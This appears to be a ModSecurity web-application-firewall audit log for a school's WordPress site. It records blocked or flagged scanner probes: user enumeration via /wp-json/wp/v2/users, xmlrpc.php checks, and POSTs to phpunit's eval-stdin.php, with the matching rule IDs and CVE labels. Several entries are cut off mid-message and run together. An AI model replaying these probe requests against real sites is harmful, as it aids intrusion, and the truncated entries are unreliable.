Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8932826e-Z-- --8a21c616-A-- [17/May/2025:08:28:52 +0700] aCfmVOm4kjNN-hEbWjJA-AAAAFU 103.236.140.4 44006 103.236.140.4 8181 --8a21c616-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a21c616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a21c616-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445332545701 2765 (- - -) Stopwatch2: 1747445332545701 2765; combined=1229, p1=421, p2=778, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a21c616-Z-- --241d9957-A-- [17/May/2025:08:28:58 +0700] aCfmWgTOsBn9MSWb6WJuqgAAAJE 103.236.140.4 44010 103.236.140.4 8181 --241d9957-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --241d9957-C-- demo.sayHello --241d9957-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --241d9957-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445338331163 6771 (- - -) Stopwatch2: 1747445338331163 6771; combined=4842, p1=578, p2=4008, p3=37, p4=41, p5=105, sr=79, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --241d9957-Z-- --fcac132a-A-- [17/May/2025:08:32:13 +0700] aCfnHem4kjNN-hEbWjJA-QAAAFg 103.236.140.4 44024 103.236.140.4 8181 --fcac132a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fcac132a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcac132a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445533092943 2850 (- - -) Stopwatch2: 1747445533092943 2850; combined=1266, p1=445, p2=789, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcac132a-Z-- --fe9e897c-A-- [17/May/2025:08:32:21 +0700] aCfnJXyxdQCiyU1ENFcntQAAABI 103.236.140.4 44028 103.236.140.4 8181 --fe9e897c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe9e897c-C-- demo.sayHello --fe9e897c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe9e897c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445541555051 4307 (- - -) Stopwatch2: 1747445541555051 4307; combined=3013, p1=436, p2=2390, p3=25, p4=29, p5=77, sr=72, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe9e897c-Z-- --dbd74753-A-- [17/May/2025:08:32:26 +0700] aCfnKum4kjNN-hEbWjJA-gAAAEA 103.236.140.4 44034 103.236.140.4 8181 --dbd74753-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbd74753-C-- demo.sayHello --dbd74753-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbd74753-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445546270714 5808 (- - -) Stopwatch2: 1747445546270714 5808; combined=4174, p1=575, p2=3376, p3=33, p4=35, p5=93, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbd74753-Z-- --16d58466-A-- [17/May/2025:08:32:43 +0700] aCfnO-m4kjNN-hEbWjJA-wAAAEI 103.236.140.4 44042 103.236.140.4 8181 --16d58466-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16d58466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16d58466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445563686671 2387 (- - -) Stopwatch2: 1747445563686671 2387; combined=1135, p1=364, p2=733, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16d58466-Z-- --da410328-A-- [17/May/2025:08:32:47 +0700] aCfnP3yxdQCiyU1ENFcnugAAAAA 103.236.140.4 44044 103.236.140.4 8181 --da410328-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --da410328-C-- demo.sayHello --da410328-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --da410328-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445567319867 3883 (- - -) Stopwatch2: 1747445567319867 3883; combined=2861, p1=467, p2=2204, p3=19, p4=19, p5=89, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da410328-Z-- --c4ff7233-A-- [17/May/2025:08:32:49 +0700] aCfnQQTOsBn9MSWb6WJuqwAAAJI 103.236.140.4 44048 103.236.140.4 8181 --c4ff7233-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c4ff7233-C-- demo.sayHello --c4ff7233-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4ff7233-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445569391154 4890 (- - -) Stopwatch2: 1747445569391154 4890; combined=3786, p1=520, p2=3067, p3=24, p4=25, p5=88, sr=118, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4ff7233-Z-- --82933a72-A-- [17/May/2025:08:32:54 +0700] aCfnRnyxdQCiyU1ENFcnvAAAABc 103.236.140.4 44060 103.236.140.4 8181 --82933a72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --82933a72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82933a72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445574649814 3358 (- - -) Stopwatch2: 1747445574649814 3358; combined=1515, p1=520, p2=961, p3=0, p4=0, p5=34, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82933a72-Z-- --dd6cf33e-A-- [17/May/2025:08:32:59 +0700] aCfnS-m4kjNN-hEbWjJA_gAAAEc 103.236.140.4 44064 103.236.140.4 8181 --dd6cf33e-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --dd6cf33e-C-- --dd6cf33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd6cf33e-E-- --dd6cf33e-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --69f30237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69f30237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445579749319 5674 (- - -) Stopwatch2: 1747445579749319 5674; combined=4297, p1=496, p2=3577, p3=37, p4=41, p5=86, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f30237-Z-- --0f87d978-A-- [17/May/2025:08:32:59 +0700] aCfnS3yxdQCiyU1ENFcnvwAAAAU 103.236.140.4 44068 103.236.140.4 8181 --0f87d978-B-- POST /vendor/phpunits/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --0f87d978-C-- --0f87d978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f87d978-E-- --0f87d978-H-- Message: Access denied with code 403 (phase 2). String match " --38921031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38921031-E-- --38921031-H-- Message: Access denied with code 403 (phase 2). String match " --7b95d808-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b95d808-H-- Message: Access denied with code 403 (phase 2). String match " --8a5a3b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a5a3b51-E-- --8a5a3b51-H-- Message: Access denied with code 403 (phase 2). String match " --d4783610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4783610-E-- --d4783610-H-- Message: Access denied with code 403 (phase 2). String match " --01ccb607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ccb607-H-- Message: Access denied with code 403 (phase 2). 
String match " --be3e104d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be3e104d-E-- --be3e104d-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --78f77255-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f77255-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445617684699 4624 (- - -) Stopwatch2: 1747445617684699 4624; combined=3605, p1=440, p2=2969, p3=22, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f77255-Z-- --13d00262-A-- [17/May/2025:08:33:40 +0700] aCfndOm4kjNN-hEbWjJBAgAAAEo 103.236.140.4 44096 103.236.140.4 8181 --13d00262-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13d00262-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13d00262-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445620417332 3239 (- - -) Stopwatch2: 1747445620417332 3239; combined=1386, p1=476, p2=877, p3=0, p4=0, p5=33, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13d00262-Z-- --990f5a3d-A-- [17/May/2025:08:33:40 +0700] aCfndOm4kjNN-hEbWjJBAwAAAEs 103.236.140.4 44098 103.236.140.4 8181 --990f5a3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --990f5a3d-C-- demo.sayHello --990f5a3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --990f5a3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445620418408 5387 (- - -) Stopwatch2: 1747445620418408 5387; combined=4043, p1=515, p2=3310, p3=30, p4=34, p5=91, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --990f5a3d-Z-- --d010307a-A-- [17/May/2025:08:33:46 +0700] aCfneum4kjNN-hEbWjJBBwAAAFE 103.236.140.4 44106 103.236.140.4 8181 --d010307a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d010307a-C-- demo.sayHello --d010307a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d010307a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445626488350 5948 (- - -) Stopwatch2: 1747445626488350 5948; combined=4093, p1=518, p2=3321, p3=42, p4=43, p5=100, sr=65, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d010307a-Z-- --519bf406-A-- [17/May/2025:08:34:01 +0700] aCfniem4kjNN-hEbWjJBDwAAAEQ 103.236.140.4 44126 103.236.140.4 8181 --519bf406-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --519bf406-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --519bf406-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445641910970 2998 (- - -) Stopwatch2: 1747445641910970 2998; combined=1300, p1=443, p2=823, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --519bf406-Z-- --58a05823-A-- [17/May/2025:08:34:07 +0700] aCfnj-m4kjNN-hEbWjJBEQAAAEg 103.236.140.4 44130 103.236.140.4 8181 --58a05823-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58a05823-C-- demo.sayHello --58a05823-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58a05823-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 